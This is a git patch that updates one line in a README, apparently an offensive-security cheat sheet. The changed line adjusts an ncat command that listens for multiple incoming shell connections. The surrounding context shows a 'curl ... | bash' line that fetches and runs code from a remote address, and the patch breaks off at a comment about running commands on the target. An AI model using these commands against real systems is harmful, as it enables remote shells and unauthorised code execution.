From a56a62d38df5d02930fe5b2238451a7a6a01c394 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 11 Oct 2023 07:45:17 +0100 Subject: [PATCH] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 5bd3d32..0aa58b9 100644 --- a/README.md +++ b/README.md @@ -1135,7 +1135,7 @@ curl -skfL https://3.13.3.7:8080 | bash Start ncat to listen for multiple connections: ```sh -ncat -kl 1524 +ncat -kltv 1524 ``` ```sh # On the target: